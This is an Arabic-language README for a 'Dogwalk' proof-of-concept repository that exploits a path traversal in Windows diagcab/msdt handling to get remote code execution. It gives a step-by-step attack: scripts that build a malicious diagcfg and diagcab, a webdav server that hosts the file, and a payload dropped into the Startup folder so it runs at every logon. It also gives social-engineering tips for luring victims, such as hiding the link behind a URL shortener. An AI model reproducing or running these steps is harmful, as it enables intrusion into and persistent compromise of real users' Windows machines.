
🐾Dogwalk PoC (باستخدام ملف diagcab للحصول على RCE على Windows)
🚨 إخلاء المسؤولية 🚨
يمنح هذا الإثبات المهاجم القدرة على تنفيذ حقن كود عن بُعد على جهاز الضحية بنظام Windows.
الهدف من هذا المستودع هو جعل الإثبات أكثر قابلية للاستخدام من <a href=https://github.com/irsl/microsoft-diagcab-rce-poc>المستودع الأصلي.
لا تستخدمه دون إذن مسبق!
فيما يتعلق بالضرر الناتج وسهولة الاستغلال،آمل أن تقوم Microsoft بإصلاحه
تحديث يوليو 2022: لم تقم Microsoft بإصلاح الثغرة في msdt بعد، لكن Microsoft Defender قادر على اكتشافها
الفكرة الأساسية: ثغرة اجتياز المسار في تقنية Diagcab من Microsoft (msdt) والتي قد تؤدي إلى تنفيذ أوامر عن بُعد.
يمكنك العثور على النشرة الكاملة في مقال المدونة
تم الإبلاغ عن الثغرة منذ عامين (بواسطة @irsl) وما زالت بدون إصلاح!
يقوم إثبات المفهوم بإعداد خادم webdav يستضيف ملف .diagcab خبيثًا ينفذ اجتياز المسار لكتابة ملف تنفيذي خبيث في C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup. كتابة ملف تنفيذي في هذا المجلد يؤدي إلى تنفيذه في كل مرة يشغّل فيها المستخدم جهاز Windows، ويُسمى هذا التنفيذ التلقائي عند التمهيد وتسجيل الدخول.
إذن، ما نحتاجه أساسًا هو:
.diagcab خبيث.diagcab(💡 استخدم ترويسة الاستجابة Content-type: application/octet-stream لجعل المتصفح ينزّل الملف تلقائيًا عند تصفح الرابط)
إذا كنت كسولًا جدًا (أو مستعجلًا) للمتابعة خطوة بخطوة:
./hurry-dogwalk.sh [WEBDAV_URL] # need docker
# Stop the server
./hurry-dogwalk.sh --clean
وإلا ↓↓
.diagcab.diagcfg هي ملفات XML بسيطة تحتفظ بمرجع لحزمة تشخيص واحدة أو أكثر وتوفر معلومات وصفية عنها.diagcab.أولًا، أنشئ custom.diagcfg:
./build-malicious-diagcfg.sh --url [WEBDAV_URL]
ثم أنشئ hotfix895214.diagcab:
cabarc.exe n hotfix895214.diagcab custom.diagcfg
# run it on windows (or with wine). If you do not find carbarc.exe use http://jc.bellamy.free.fr/download/cabarc.exe or http://download.microsoft.com/download/platformsdk/cab/2.0/w98nt42kmexp/en-us/Cabsdk.exe
أخيرًا، انقله إلى مجلد ./webdav/diagcab-webdav-poc/config
ضع الملف التنفيذي الذي تريد نقله إلى جهاز الضحية داخل مجلد ./webdav/malicious... (هنا نستخدم calc.exe الكلاسيكي)
...وأطلق الخادم:
cd ./webdav/diagcab-webdav-poc/
perl diagcab-webdav-poc.pl
الملف الخبيث .diagcab متاح على https://[WEBDAV_URL]/config/hotfix895214.diagcab. عليك الآن إغراء الضحية للنقر على هذا الرابط.
(💡 يمكنك استخدام مختصر الروابط لجعله يبدو أقل اشتباهًا)
🐾🐾
